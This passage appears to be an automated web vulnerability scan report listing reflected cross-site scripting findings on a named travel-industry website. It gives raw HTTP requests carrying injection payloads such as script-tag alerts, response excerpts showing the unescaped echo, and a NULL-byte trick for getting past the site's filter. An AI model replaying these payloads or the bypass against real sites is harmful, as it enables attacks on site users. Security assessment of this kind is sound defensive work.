Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618426; expires=Tue, 02-Oct-2012 00:07:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>37f18bb685c">homea0336<a>37f18bb685c</a>
...[SNIP]...
4.354. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef105"><a>e4de0a727fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homeef105"><a>e4de0a727fd/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=sabre+travel
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618421; expires=Tue, 02-Oct-2012 00:07:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homeef105"><a>e4de0a727fd">
...[SNIP]...
4.355. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc642<a>5bcd5f2dd13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homedc642<a>5bcd5f2dd13/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:09:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622190; expires=Tue, 02-Oct-2012 01:09:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractse92c1ab4e44194d35e%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractsf713cabeee734755a5%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:09:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>5bcd5f2dd13">homedc642<a>5bcd5f2dd13</a>
...[SNIP]...
4.356. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3ca1"><script>alert(1)</script>7930a41e3ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /homee3ca1"><script>alert(1)</script>7930a41e3ba/products_services/product_index/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:09:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622187; expires=Tue, 02-Oct-2012 01:09:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractse92c1ab4e44194d35e%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontractsf713cabeee734755a5%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:09:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/homee3ca1"><script>alert(1)</script>7930a41e3ba/products_services">
...[SNIP]...
4.357. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002fe48<a>3768ca006c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fe48<a>3768ca006c9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index/?%002fe48<a>3768ca006c9=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:08:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622102; expires=Tue, 02-Oct-2012 01:08:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services2c5deab90be61d62c8%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_servicesd302bab25f3e4afffc%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:08:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130365


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a>3768ca006c9=1">?%002fe48<a>3768ca006c9=1</a>
...[SNIP]...
4.358. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/product_index/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0095469"><a>31da79be35d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95469"><a>31da79be35d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index/?%0095469"><a>31da79be35d=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/cse?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=travel+booking+hotel&sa.x=0&sa.y=0&ad=n9&num=10&rurl=http%3A%2F%2Fwww.sabretravelnetwork.com%2Fhome%2Fsearch%2Fshow_results%3Fcx%3D000492012218074769583%253Az9egyc6spxy%26cof%3DFORID%253A10%26ie%3DUTF-8%26q%3Dtravel%2Bbooking%2Bhotel%26sa.x%3D0%26sa.y%3D0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.3.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621521; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622029; expires=Tue, 02-Oct-2012 01:07:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:11 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 130369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/home/products_services/product_index/?%0095469"><a>31da79be35d=1">
...[SNIP]...
4.359. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3098c<a>037679025cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home3098c<a>037679025cb/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622038; expires=Tue, 02-Oct-2012 01:07:18 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:18 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>037679025cb">home3098c<a>037679025cb</a>
...[SNIP]...
4.360. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79af8"><script>alert(1)</script>8f014a76d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home79af8"><script>alert(1)</script>8f014a76d97/products_services/travel_agency/contracts/ HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:07:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317622037; expires=Tue, 02-Oct-2012 01:07:17 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:07:17 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13537


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home79af8"><script>alert(1)</script>8f014a76d97/products_services">
...[SNIP]...
4.361. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0060a0b"><a>1e2cd697e59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60a0b"><a>1e2cd697e59 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/travel_agency/contracts/?%0060a0b"><a>1e2cd697e59=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; exp_last_activity=1317621580; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621887; expires=Tue, 02-Oct-2012 01:04:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:04:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/travel_agency/contracts/?%0060a0b"><a>1e2cd697e59=1">
...[SNIP]...
4.362. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home/products_services/travel_agency/contracts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00b86bc<a>3b3252b8864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b86bc<a>3b3252b8864 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

